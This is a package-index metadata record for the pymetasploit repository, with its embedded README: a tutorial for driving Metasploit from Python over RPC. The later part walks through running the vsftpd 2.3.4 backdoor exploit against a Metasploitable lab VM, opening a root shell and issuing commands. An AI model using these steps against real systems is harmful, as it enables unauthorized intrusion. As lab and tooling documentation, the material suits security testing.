{"id":13789509,"url":"https://github.com/allfro/pymetasploit","last_synced_at":"2025-05-12T06:31:39.338Z","repository":{"id":4035831,"uuid":"5136815","full_name":"allfro/pymetasploit","owner":"allfro","description":"A full-fledged msfrpc library for Metasploit framework.","archived":false,"fork":false,"pushed_at":"2021-08-31T18:48:19.000Z","size":80,"stargazers_count":303,"open_issues_count":22,"forks_count":138,"subscribers_count":25,"default_branch":"master","last_synced_at":"2025-04-20T09:55:50.985Z","etag":null,"topics":[],"latest_commit_sha":null,"homepage":null,"language":"Python","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":null,"status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/allfro.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":null,"funding":null,"license":null,"code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":null,"support":null}},"created_at":"2012-07-21T20:58:38.000Z","updated_at":"2025-04-10T16:37:36.000Z","dependencies_parsed_at":"2022-07-12T23:10:34.655Z","dependency_job_id":null,"html_url":"https://github.com/allfro/pymetasploit","commit_stats":null,"previous_names":[],"tags_count":0,"template":false,"template_full_name":null,"repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/allfro%2Fpymetasploit","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/allfro%2Fpymetasploit/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/allfro%2Fpymetasploit/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/allfro%2Fpymetasploit/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/allfro","download_url":"https://codeload.github.com/allfro/pymetasploit/tar.gz/refs/heads/master","host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":253687553,"owners_count":21947694,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2022-07-04T15:15:14.044Z","host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"}},"keywords":[],"created_at":"2024-08-03T22:00:25.477Z","updated_at":"2025-05-12T06:31:39.059Z","avatar_url":"https://github.com/allfro.png","language":"Python","readme":"PyMetasploit - a full-fledged msfrpc library for Python\n-------------------------------------------------------\n\nPyMetasploit is a full-fledged `msfrpc` library for Python. It is meant to interact with the msfrpcd daemon that comes\nwith the latest versions of Metasploit. It does NOT interact with the console-based scripts that Metasploit provides\nsuch as msfconsole, msfvenom, etc. Therefore, before you can begin to use this library, you'll need to initialize\n`msfrpcd` and optionally (highly recommended) PostgreSQL.\n\n# Requirements\n\nBefore we begin, you'll need to install the following components:\n\n* **Metasploit:** https://github.com/rapid7/metasploit-framework\n* **PostgreSQL (Optional):** http://www.postgresql.org\n\nInstalling PostgreSQL is highly recommended as it will improve response times when querying `msfrpcd` (Metasploit RPC\ndaemon) for module information.\n\n# Tutorial\n\n## Starting `msfrpcd`\n\n`msfrpcd` accepts the following arguments:\n\n```bash\n$ ./msfrpcd -h\n\n   Usage: msfrpcd \u003coptions\u003e\n\n   OPTIONS:\n\n       -P \u003copt\u003e  Specify the password to access msfrpcd\n       -S        Disable SSL on the RPC socket\n       -U \u003copt\u003e  Specify the username to access msfrpcd\n       -a \u003copt\u003e  Bind to this IP address\n       -f        Run the daemon in the foreground\n       -h        Help banner\n       -n        Disable database\n       -p \u003copt\u003e  Bind to this port instead of 55553\n       -u \u003copt\u003e  URI for Web server\n```\n\nThe only parameter that is required to launch `msfrpcd` is the `-P` (password) parameter. This specifies the password\nthat will be used to authenticate users to the daemon. As of this writing, `msfrpcd` only supports one username/password\ncombination. However, the same user can log into the daemon multiple times. Unless specified otherwise, the `msfrpcd`\ndaemon listens on port 55553 on all interfaces (`0.0.0.0:55553`).\n\nFor the purposes of this tutorial let's start the `msfrpcd` daemon with a minimal configuration:\n\n```bash\n$ ./msfrpcd -P mypassword -n -f -a 127.0.0.1\n[*] MSGRPC starting on 0.0.0.0:55553 (SSL):Msg...\n[*] MSGRPC ready at 2014-04-19 23:49:39 -0400.\n```\n\nThe `-f` parameter tells `msfrpcd` to remain in the foreground and the `-n` parameter disables database support.\nFinally, the `-a` parameter tells `msfrcpd` to listen for requests only on the local loopback interface (`127.0.0.1`).\n\n## `MsfRpcClient` - Brief Overview\n\n### Connecting to `msfrpcd`\n\nLet's get started interacting with the Metasploit framework from python:\n\n```python\n\u003e\u003e\u003e from metasploit.msfrpc import MsfRpcClient\n\u003e\u003e\u003e client = MsfRpcClient('mypassword')\n```\n\nThe `MsfRpcClient` class provides the core functionality to navigate through the Metasploit framework. Let's take a\nlook at its underbelly:\n\n```python\n\u003e\u003e\u003e [m for m in dir(client) if not m.startswith('_')]\n['auth', 'authenticated', 'call', 'client', 'consoles', 'core', 'db', 'jobs', 'login', 'logout', 'modules', 'plugins',\n'port', 'server', 'sessionid', 'sessions', 'ssl', 'uri']\n\u003e\u003e\u003e\n```\n\nLike the metasploit framework, `MsfRpcClient` is segmented into different management modules:\n\n* **`auth`**: manages the authentication of clients for the `msfrpcd` daemon.\n* **`consoles`**: manages interaction with consoles/shells created by Metasploit modules.\n* **`core`**: manages the Metasploit framework core.\n* **`db`**: manages the backend database connectivity for `msfrpcd`.\n* **`modules`**: manages the interaction and configuration of Metasploit modules (i.e. exploits, auxiliaries, etc.)\n* **`plugins`**: manages the plugins associated with the Metasploit core.\n* **`sessions`**: manages the interaction with Metasploit meterpreter sessions.\n\n### Running an Exploit\n\nJust like the Metasploit console, you can retrieve a list of all the modules that are available. Let's take a look at\nwhat exploits are currently loaded:\n\n```python\n\u003e\u003e\u003e client.modules.exploits\n['windows/wins/ms04_045_wins', 'windows/winrm/winrm_script_exec', 'windows/vpn/safenet_ike_11',\n'windows/vnc/winvnc_http_get', 'windows/vnc/ultravnc_viewer_bof', 'windows/vnc/ultravnc_client', ...\n'aix/rpc_ttdbserverd_realpath', 'aix/rpc_cmsd_opcode21']\n\u003e\u003e\u003e\n```\n\nWe can also retrieve a list of `auxiliary`, `encoders`, `nops`, `payloads`, and `post` modules using the same syntax:\n\n```python\n\u003e\u003e\u003e client.modules.auxiliary\n...\n\u003e\u003e\u003e client.modules.encoders\n...\n\u003e\u003e\u003e client.modules.nops\n...\n\u003e\u003e\u003e client.modules.payloads\n...\n\u003e\u003e\u003e client.modules.post\n...\n```\n\nNow let's interact with one of the `exploit` modules:\n\n```python\n\u003e\u003e\u003e exploit = client.modules.use('exploit', 'unix/ftp/vsftpd_234_backdoor')\n\u003e\u003e\u003e\n```\n\nIf all is well at this point, you will be able to query the module for various pieces of information such as author,\ndescription, required run-time options, etc. Let's take a look:\n\n```python\n\u003e\u003e\u003e  print exploit.description\n\n          This module exploits a malicious backdoor that was added to the\tVSFTPD download\n          archive. This backdoor was introduced into the vsftpd-2.3.4.tar.gz archive between\n          June 30th 2011 and July 1st 2011 according to the most recent information\n          available. This backdoor was removed on July 3rd 2011.\n\n\u003e\u003e\u003e exploit.authors\n['hdm \u003chdm@metasploit.com\u003e', 'MC \u003cmc@metasploit.com\u003e']\n\u003e\u003e\u003e exploit.options\n['TCP::send_delay', 'ConnectTimeout', 'SSLVersion', 'VERBOSE', 'SSLCipher', 'CPORT', 'SSLVerifyMode', 'SSL', 'WfsDelay',\n'CHOST', 'ContextInformationFile', 'WORKSPACE', 'EnableContextEncoding', 'TCP::max_send_size', 'Proxies',\n'DisablePayloadHandler', 'RPORT', 'RHOST']\n\u003e\u003e\u003e exploit.required # Required options\n['ConnectTimeout', 'RPORT', 'RHOST']\n```\n\nThat's all fine and dandy but you're probably really itching to pop a box with this library right now, amiright!? Let's\ndo it! Let's use a [Metasploitable 2](http://sourceforge.net/projects/metasploitable/) instance running on a VMWare\nmachine as our target. Luckily it's running our favorite version of vsFTPd - 2.3.4 - and we already have our exploit\nmodule loaded in PyMetasploit. Our next step is to specify our target:\n\n```python\n\u003e\u003e\u003e exploit['RHOST'] = '172.16.14.145' # IP of our target host\n\u003e\u003e\u003e\n```\n\nYou can also specify or retrieve other options as well, as long as they're listed in `exploit.options`, using the same\nmethod as shown above. For example, let's get and set the `VERBOSE` option:\n\n```python\n\u003e\u003e\u003e exploit['VERBOSE']\nFalse\n\u003e\u003e\u003e exploit['VERBOSE'] = True\n\u003e\u003e\u003e exploit['VERBOSE']\nTrue\n\u003e\u003e\u003e\n```\n\nAwesome! So now we're ready to execute our exploit. All we need to do is select a payload:\n\n```python\n\u003e\u003e\u003e exploit.payloads\n['cmd/unix/interact']\n\u003e\u003e\u003e\n```\n\nAt this point, this exploit only supports one payload (`cmd/unix/interact`). So let's pop a shell:\n\n```python\n\u003e\u003e\u003e exploit.execute(payload='cmd/unix/interact')\n{'job_id': 1, 'uuid': '3whbuevf'}\n\u003e\u003e\u003e\n```\n\nExcellent! It looks like our exploit ran successfully. How can we tell? The `job_id` key contains a number. If the\nmodule failed to execute for any reason, `job_id` would be `None`. For long running modules, you may want to poll the\njob list by checking `client.jobs.list`. Since this is a fairly quick exploit, the job list will most likely be empty\nand if we managed to pop our box, we might see something nice in the sessions list:\n\n```python\n\u003e\u003e\u003e client.sessions.list\n{1: {'info': '', 'username': 'ndouba', 'session_port': 21, 'via_payload': 'payload/cmd/unix/interact',\n'uuid': '5orqnnyv', 'tunnel_local': '172.16.14.1:58429', 'via_exploit': 'exploit/unix/ftp/vsftpd_234_backdoor',\n'exploit_uuid': '3whbuevf', 'tunnel_peer': '172.16.14.145:6200', 'workspace': 'false', 'routes': '',\n'target_host': '172.16.14.145', 'type': 'shell', 'session_host': '172.16.14.145', 'desc': 'Command shell'}}\n\u003e\u003e\u003e\n```\n\nSuccess! We managed to pop the box! `client.sessions.list` shows us that we have a live session with the same `uuid` as\nthe one we received when executing the module earlier (`exploit.execute()`). Let's interact with the shell:\n\n```python\n\u003e\u003e\u003e shell = client.sessions.session(1)\n\u003e\u003e\u003e shell.write('whoami\\n')\n\u003e\u003e\u003e print shell.read()\nroot\n\u003e\u003e\u003e # Happy dance!\n```\n\nThis is just a sample of how powerful PyMetasploit can be. Use your powers wisely, Grasshopper, because with great power\ncomes great responsibility – unless you are a banker.\n\n# Questions?\n\nEmail me at ndouba.at.gmail.com\n","funding_links":[],"categories":["Internet","Python"],"sub_categories":[],"project_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fallfro%2Fpymetasploit","html_url":"https://awesome.ecosyste.ms/projects/github.com%2Fallfro%2Fpymetasploit","lists_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fallfro%2Fpymetasploit/lists"}